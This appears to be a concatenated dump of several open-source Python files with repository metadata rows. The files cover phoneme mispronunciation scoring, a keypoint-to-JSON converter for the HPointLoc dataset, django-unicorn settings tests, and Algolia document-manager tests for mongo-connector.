print(f"has mispro: {bool(has_mispro)}")
print_editops(edit_ops, hyp_phns, ref_phns)
mispro_detected = check_mispro(edit_ops, hyp_phns, ref_phns, eval_phn)
print(f"mispro detected?: {mispro_detected}")
print(f"detector is correct?: {has_mispro == mispro_detected}")
print('\n\n')
def assess_from_json(eval_phn_path, ds_json_path):
ds_preds = read_data_json(ds_json_path)
rec_to_eval_phns = read_eval_file(eval_phn_path)
for xmpl in ds_preds:
ref_phns = xmpl['label']
hyp_phns = xmpl['prediction']
edit_ops = get_editops(hyp_phns, ref_phns)
rec_id = path_to_id(xmpl['filename'])
rec_id, has_mispro, eval_phns = rec_to_eval_phns[rec_id]
for eval_phn in eval_phns:
print(f"record id: {rec_id}")
print(f"evaluation phone: {eval_phn}")
print(f"has mispro: {bool(has_mispro)}")
print_editops(edit_ops, hyp_phns, ref_phns)
mispro_detected = check_mispro(edit_ops, hyp_phns, ref_phns, eval_phn)
print(f"mispro detected?: {mispro_detected}")
print(f"detector is correct?: {has_mispro == mispro_detected}")
print('\n\n')
def read_eval_file(eval_phn_path:str, id_to_order:dict=None)->dict:
"""Reads the eval-phn file that contains information on the mispronunciations
for each record and returns that information as a mapping from record to phonemes.
Args:
eval_phn_path: path to eval file
id_to_order: mapping from record_id to the ordering. used for w2v files
Returns:
dict: mapping record_id or order to target phonemes information
"""
with open(eval_phn_path, 'r') as lbl_f:
header = next(lbl_f).strip().split()
phn_hdr = header[2:]
rec_to_eval_phns = {}
for line in lbl_f:
line = line.strip().split('\t')
rec_id, has_mispro, row_lbl = line[0], int(line[1]), list(map(int, line[2:]))
eval_phns = [phn_hdr[i] for i, one_h in enumerate(row_lbl) if one_h ==1]
key = id_to_order[rec_id] if id_to_order else rec_id
rec_to_eval_phns[key] = (rec_id, has_mispro, eval_phns)
return rec_to_eval_phns
def check_mispro(edit_ops, hyp_phns, ref_phns, target_phn):
hyp_phns, ref_phns = balance_phn_lengths(edit_ops, hyp_phns, ref_phns)
mispro_detected = False
for op, spos, dpos in edit_ops:
if target_phn in ref_phns[dpos]:
# don't include delete operations when assessing mispro
if op == 'delete':
continue
else:
# if target_phn is in both the hypo and tgt
# handles cases where `r` is replaced by `er`, which is not a mispro
if target_phn in hyp_phns[spos] and target_phn in ref_phns[dpos]:
continue
else:
mispro_detected = True
return mispro_detected
def balance_phn_lengths(edit_ops, s_phns, d_phns):
"""lengths the source_phones or dest_phones if the indices in editops are
greater than the lengths of the respective phoneme lists"""
for _, spos, dpos in edit_ops:
if spos > len(s_phns)-1:
s_phns += ['blank'] * (spos - (len(s_phns)-1))
if dpos > len(d_phns)-1:
d_phns += ['blank'] * (dpos - (len(d_phns)-1))
return s_phns, d_phns
def get_editops(hyp_phns, ref_phns):
phn_super_set = set(hyp_phns + ref_phns)
p2c = {ph:chr(65+i) for i, ph in enumerate(sorted(phn_super_set))}
c2p = {chr(65+i):ph for i, ph in enumerate(sorted(phn_super_set))}
hyp_chars = "".join([p2c[ph] for ph in hyp_phns])
ref_chars = "".join([p2c[ph] for ph in ref_phns])
return lev.editops(hyp_chars, ref_chars)
def print_editops(edit_ops, hyp_phns, ref_phns):
print(f"hypos: {hyp_phns}")
print(f"tgts: {ref_phns}")
hyp_phns, ref_phns = balance_phn_lengths(edit_ops, hyp_phns, ref_phns)
for op, spos, dpos in edit_ops:
try:
print(
'{:7} s[{}] --> d[{}] {!r:>8} --> {!r}'.\
format(op, spos, dpos, hyp_phns[spos], ref_phns[dpos])
)
except IndexError as e:
print("Index Error")
print(op, spos, dpos, hyp_phns, ref_phns)
raise e
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=""
)
parser.add_argument(
"--action", help="determines what function to call"
)
parser.add_argument(
"--hypo-path", help="path to w2v predictions"
)
parser.add_argument(
"--json-path", help="path to json prediction for deepspeech model"
)
parser.add_argument(
"--phn-path", help="path to w2v predictions"
)
parser.add_argument(
"--eval-phn-path", type=str, help="path to one-hot encoding for evaluation phonemes by utterance id"
)
args = parser.parse_args()
if args.action == "":
main(args.hypo_path, args.phn_path, args.eval_phn_path)
elif args.action == "assess-from-json":
assess_from_json(args.eval_phn_path, args.json_path)
| 36.481651 | 108 | 0.592355 | 1,145 | 7,953 | 3.868996 | 0.215721 | 0.034763 | 0.036117 | 0.047404 | 0.365463 | 0.307223 | 0.24763 | 0.228217 | 0.196388 | 0.145824 | 0 | 0.021439 | 0.307934 | 7,953 | 217 | 109 | 36.64977 | 0.78343 | 0.222306 | 0 | 0.276119 | 0 | 0 | 0.129801 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052239 | false | 0 | 0.029851 | 0 | 0.11194 | 0.156716 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68b8f74ca63a7bf7763bdfc88965696eef401268 | 1,980 | py | Python | pipelines/utils/conv_to_json.py | cds-mipt/HPointLoc | b346c10928939ddc1fe5840aef5085418e3aa0ad | [
"MIT"
] | 2 | 2021-05-30T04:04:51.000Z | 2022-02-21T09:11:27.000Z | pipelines/utils/conv_to_json.py | cds-mipt/HPointLoc | b346c10928939ddc1fe5840aef5085418e3aa0ad | [
"MIT"
] | null | null | null | pipelines/utils/conv_to_json.py | cds-mipt/HPointLoc | b346c10928939ddc1fe5840aef5085418e3aa0ad | [
"MIT"
] | null | null | null | from tqdm import tqdm
import h5py
from os.path import join
import os
import numpy as np
from pathlib import Path
import json
import numpy as np
MAXDEPTH = 10
def conv_to_json(dataset_root, path_to_npz_folder, output_dir):
root_datasets = Path(dataset_root).parent
dataset_path = join(root_datasets, 'HPointLoc_dataset')
pairs_npz = os.listdir(path_to_npz_folder)
os.makedirs(output_dir, exist_ok = True)
for pair_npz in tqdm(pairs_npz):
npz = np.load(join(path_to_npz_folder, pair_npz))
q_fold, q_cloud, query, q_name = pair_npz.split('_')[:4]
m_fold, m_cloud, mapping, m_name = pair_npz.split('_')[4:8]
q = '_'.join(pair_npz.split('_')[:4])
m = '_'.join(pair_npz.split('_')[4:8])
q_cloud = q_fold + '_point' + q_cloud + '.hdf5'
m_cloud = m_fold + '_point' + m_cloud + '.hdf5'
hdf5_q_path = join(dataset_path, q_fold, q_cloud)
hdf5_m_path = join(dataset_path, m_fold, m_cloud)
q_file = h5py.File(hdf5_q_path, 'r')
m_file = h5py.File(hdf5_m_path, 'r')
depth_base = m_file['depth_base']
depth = q_file['depth']
q_depth = np.squeeze(depth[int(q_name)])*MAXDEPTH
m_depth = np.squeeze(depth_base[int(m_name)])*MAXDEPTH
q_coord_frame = []
m_coord_frame = []
for kpt in range(min(npz['keypoints1'].shape[0], npz['matches'].shape[0])):
if npz['matches'][kpt] != -1:
x_q, y_q = map(int, npz['keypoints0'][kpt])
x_m, y_m = map(int, npz['keypoints1'][npz['matches'][kpt]])
q_coord_frame.append((x_q, y_q, float(q_depth[y_q, x_q])))
m_coord_frame.append((x_m, y_m, float(m_depth[y_m, x_m])))
dictionary_kpt = {q: q_coord_frame, m:m_coord_frame}
outpath = join(output_dir, q + '_' + m + '.json')
with open(outpath, 'w') as outfile:
json.dump(str(dictionary_kpt), outfile)
| 36.666667 | 84 | 0.609596 | 306 | 1,980 | 3.607843 | 0.25817 | 0.038043 | 0.043478 | 0.047101 | 0.067029 | 0.027174 | 0 | 0 | 0 | 0 | 0 | 0.015509 | 0.25101 | 1,980 | 53 | 85 | 37.358491 | 0.728928 | 0 | 0 | 0.047619 | 0 | 0 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.190476 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68b9f1d61e16d200b4bd96fbc017a9c896eef126 | 1,020 | py | Python | tests/test_settings.py | nerdoc/django-unicorn | e512b8f64f5c276a78127db9a05d9d5c042232d5 | [
"MIT"
] | 1 | 2021-12-21T16:20:49.000Z | 2021-12-21T16:20:49.000Z | tests/test_settings.py | teury/django-unicorn | 5e9142b8a7e13b862ece419d567e805cc783b517 | [
"MIT"
] | null | null | null | tests/test_settings.py | teury/django-unicorn | 5e9142b8a7e13b862ece419d567e805cc783b517 | [
"MIT"
] | 1 | 2022-02-10T07:47:01.000Z | 2022-02-10T07:47:01.000Z | from django_unicorn.settings import get_cache_alias, get_serial_enabled, get_settings
def test_settings_cache_alias(settings):
settings.UNICORN["CACHE_ALIAS"] = "unicorn_cache"
expected = "unicorn_cache"
actual = get_cache_alias()
assert expected == actual
def test_settings_legacy(settings):
settings.DJANGO_UNICORN = {}
settings.DJANGO_UNICORN["CACHE_ALIAS"] = "unicorn_cache"
expected = "unicorn_cache"
actual = get_cache_alias()
assert expected == actual
def test_get_serial_enabled(settings):
settings.UNICORN["SERIAL"]["ENABLED"] = False
assert get_serial_enabled() is False
settings.UNICORN["SERIAL"]["ENABLED"] = True
assert get_serial_enabled() is True
settings.UNICORN["SERIAL"]["ENABLED"] = True
settings.CACHES["unicorn_cache"] = {}
settings.CACHES["unicorn_cache"][
"BACKEND"
] = "django.core.cache.backends.dummy.DummyCache"
settings.UNICORN["CACHE_ALIAS"] = "unicorn_cache"
assert get_serial_enabled() is False
| 29.142857 | 85 | 0.721569 | 120 | 1,020 | 5.833333 | 0.208333 | 0.171429 | 0.114286 | 0.102857 | 0.544286 | 0.418571 | 0.271429 | 0.271429 | 0.271429 | 0.271429 | 0 | 0 | 0.163725 | 1,020 | 34 | 86 | 30 | 0.820633 | 0 | 0 | 0.5 | 0 | 0 | 0.208824 | 0.042157 | 0 | 0 | 0 | 0 | 0.208333 | 1 | 0.125 | false | 0 | 0.041667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68bd12edd81d237215484f0a679fa547355b6ddd | 5,132 | py | Python | tests/test_algolia_doc_manager.py | algolia/mongo-connector | d668e9fb556abe63916ba0594e035d2f34880b1c | [
"Apache-2.0"
] | 15 | 2015-01-06T08:10:21.000Z | 2017-03-12T23:06:43.000Z | tests/test_algolia_doc_manager.py | algolia/mongo-connector | d668e9fb556abe63916ba0594e035d2f34880b1c | [
"Apache-2.0"
] | 16 | 2015-03-11T09:28:33.000Z | 2016-03-06T14:45:54.000Z | tests/test_algolia_doc_manager.py | algolia/mongo-connector | d668e9fb556abe63916ba0594e035d2f34880b1c | [
"Apache-2.0"
] | 13 | 2015-03-21T13:39:10.000Z | 2022-03-14T11:50:24.000Z | # Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for the Algolia DocManager."""
import base64
import sys
import time
sys.path[0:0] = [""]
from tests import elastic_pair, unittest, TESTARGS
from tests.test_algolia import AlgoliaTestCase
from tests.test_gridfs_file import MockGridFSFile
from mongo_connector.command_helper import CommandHelper
from mongo_connector.doc_managers.algolia_doc_manager import DocManager
class AlgoliaDocManagerTester(AlgoliaTestCase):
"""Unit tests for the Algolia DocManager."""
def test_update(self):
"""Test the update method."""
doc = {"_id": '1', "a": 1, "b": 2}
self.algolia_doc.upsert(doc)
self.algolia_doc.commit(True)
# $set only
update_spec = {"$set": {"a": 1, "b": 2}}
self.algolia_doc.update(doc, update_spec)
self.algolia_doc.commit(True)
doc = self.algolia_index.getObject('1')
self.assertEqual(doc, {"_id": '1', "objectID": '1', "a": 1, "b": 2})
# $unset only
update_spec = {"$unset": {"a": True}}
self.algolia_doc.update(doc, update_spec)
self.algolia_doc.commit(True)
doc = self.algolia_index.getObject('1')
self.assertEqual(doc, {"_id": '1', "objectID": '1', "b": 2, "a": None})
# mixed $set/$unset
update_spec = {"$unset": {"b": True}, "$set": {"c": 3}}
self.algolia_doc.update(doc, update_spec)
self.algolia_doc.commit(True)
doc = self.algolia_index.getObject('1')
self.assertEqual(doc, {"_id": '1', "objectID": '1', "c": 3, "a": None, "b": None})
def test_upsert(self):
"""Test the upsert method."""
docc = {'_id': '1', 'name': 'John'}
self.algolia_doc.upsert(docc)
self.algolia_doc.commit(True)
res = self.algolia_index.search('')["hits"]
for doc in res:
self.assertEqual(doc['_id'], '1')
self.assertEqual(doc['name'], 'John')
def test_bulk_upsert(self):
"""Test the bulk_upsert method."""
self.algolia_doc.bulk_upsert([], *TESTARGS)
self.algolia_doc.commit(True)
docs = ({"_id": i} for i in range(100))
self.algolia_doc.bulk_upsert(docs, *TESTARGS)
self.algolia_doc.commit(True)
res = self.algolia_index.search('', { 'hitsPerPage': 101 })["hits"]
returned_ids = sorted(int(doc["_id"]) for doc in res)
self.assertEqual(len(returned_ids), 100)
for i, r in enumerate(returned_ids):
self.assertEqual(r, i)
docs = ({"_id": i, "weight": 2*i} for i in range(100))
self.algolia_doc.bulk_upsert(docs, *TESTARGS)
self.algolia_doc.commit(True)
res = self.algolia_index.search('', { 'hitsPerPage': 101 })["hits"]
returned_ids = sorted(int(doc["weight"]) for doc in res)
self.assertEqual(len(returned_ids), 100)
for i, r in enumerate(returned_ids):
self.assertEqual(r, 2*i)
def test_remove(self):
"""Test the remove method."""
docc = {'_id': '1', 'name': 'John'}
self.algolia_doc.upsert(docc)
self.algolia_doc.commit(True)
res = self.algolia_index.search('')["hits"]
self.assertEqual(len(res), 1)
self.algolia_doc.remove(docc)
self.algolia_doc.commit(True)
res = self.algolia_index.search('')["hits"]
self.assertEqual(len(res), 0)
@unittest.skip("WIP")
def test_get_last_doc(self):
"""Test the get_last_doc method.
Make sure we can retrieve the document most recently modified from Algolia.
"""
base = self.algolia_doc.get_last_doc()
ts = base.get("_ts", 0) if base else 0
docc = {'_id': '4', 'name': 'Hare', '_ts': ts+3, 'ns': 'test.test'}
self.algolia_doc.upsert(docc)
docc = {'_id': '5', 'name': 'Tortoise', '_ts': ts+2, 'ns': 'test.test'}
self.algolia_doc.upsert(docc)
docc = {'_id': '6', 'name': 'Mr T.', '_ts': ts+1, 'ns': 'test.test'}
self.algolia_doc.upsert(docc)
self.algolia_doc.commit(True)
self.assertEqual(self.algolia_index.search('')['nbHits'], 3)
doc = self.elastic_doc.get_last_doc()
self.assertEqual(doc['_id'], '4')
docc = {'_id': '6', 'name': 'HareTwin', '_ts': ts+4, 'ns': 'test.test'}
self.elastic_doc.upsert(docc)
self.algolia_doc.commit(True)
doc = self.elastic_doc.get_last_doc()
self.assertEqual(doc['_id'], '6')
self.assertEqual(self.algolia_index.search('')['nbHits'], 3)
if __name__ == '__main__':
unittest.main()
| 38.298507 | 90 | 0.616329 | 690 | 5,132 | 4.424638 | 0.237681 | 0.129708 | 0.119227 | 0.078611 | 0.542745 | 0.52342 | 0.483459 | 0.476253 | 0.432034 | 0.432034 | 0 | 0.018663 | 0.227397 | 5,132 | 133 | 91 | 38.586466 | 0.751324 | 0.171083 | 0 | 0.454545 | 0 | 0 | 0.077879 | 0 | 0 | 0 | 0 | 0 | 0.170455 | 1 | 0.056818 | false | 0 | 0.090909 | 0 | 0.159091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |